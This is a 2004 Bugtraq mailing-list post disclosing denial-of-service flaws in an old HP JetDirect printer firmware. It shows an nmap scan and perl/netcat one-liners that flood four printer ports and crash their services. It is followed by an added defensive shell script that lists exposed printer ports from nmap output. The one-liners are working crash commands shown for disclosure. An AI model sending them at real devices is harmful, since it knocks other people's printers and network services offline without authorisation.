Message-ID: <Pine.BSO.4.58.0410011253080.17995@voodoo.mediaservice.net>
Date: Fri, 1 Oct 2004 13:04:59 +0200 (CEST)
From: Marco Ivaldi <raptor@...eadbeef.info>
To: bugtraq@...urityfocus.com
Subject: Re: Promiscuous email printing in Canon imageRunner
> Try scanning the Ip address with nmap -A 10.0.0.1

Hello Bugtraq,

While we're talking about printers, some time ago I discovered by accident
some lame Denial of Service vulnerabilities in my HP JetDirect printer
(tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if
they can be reproduced on newer models/firmwares.

Here we go:

root@...ron:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
23/tcp open telnet HP JetDirect printer telnetd
80/tcp open http?
515/tcp open printer?
9100/tcp open jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

# telnet -> crash of all network services
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23

# http -> crash of all network services with funny stack dump on paper! ;)
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80

# printer -> the printer switches indefinitely between data recv and ready
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515

# jetdirect -> prints ABCD... and leaves the printer in "unstable" status
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

I've scanned the funny stack dump printed on paper and put it on-line at:

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

You should also take a look at Paul Szabo's excellent web resources on
PostScript, PJL/PCL, and secure HP printer configuration:

http://www.maths.usyd.edu.au:8000/u/psz/ps.html

Cheers,

--
Marco Ivaldi
Antifork Research, Inc. http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
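
An added example, not part of the original post: a shell audit that reads nmap output in the format shown in the message and lists which printers have the four services it names (23, 80, 515, 9100) reachable, as a starting point for restricting access to them. The function names, host names and sample scan are constructed for illustration.

```shell
# Added example, not from the original post; function names are hypothetical.
# Reads nmap normal-format output on stdin. A host counts as a printer when
# 515/tcp or 9100/tcp is open or a row mentions JetDirect; for such hosts,
# every open port among 23, 80, 515, 9100 is printed as "host port/tcp".
printer_exposure() {
    awk '
        function emit() {
            if (is_printer) printf "%s", rows
            rows = ""; is_printer = 0
        }
        # Start of a host block (old and current nmap header wording).
        /^(Interesting ports on|Nmap scan report for) / {
            emit()
            host = $0
            sub(/^(Interesting ports on|Nmap scan report for) /, "", host)
            sub(/:$/, "", host)
            next
        }
        # Port table rows, e.g. "9100/tcp open jetdirect?".
        $1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
            port = $1
            sub(/\/tcp$/, "", port)
            if (port == "515" || port == "9100" || tolower($0) ~ /jetdirect/)
                is_printer = 1
            if (port == "23" || port == "80" || port == "515" || port == "9100")
                rows = rows host " " $1 "\n"
        }
        END { emit() }
    '
}

# Constructed sample modelled on the scan in the post; 192.0.2.0/24 is a
# documentation address range, and both host names are made up.
sample_scan() {
    cat <<'EOF'
Interesting ports on printer.example (192.0.2.10):
PORT STATE SERVICE VERSION
23/tcp open telnet HP JetDirect printer telnetd
80/tcp open http?
515/tcp open printer?
9100/tcp open jetdirect?
Interesting ports on web.example (192.0.2.20):
PORT STATE SERVICE VERSION
22/tcp open ssh
80/tcp open http
EOF
}

sample_scan | printer_exposure
```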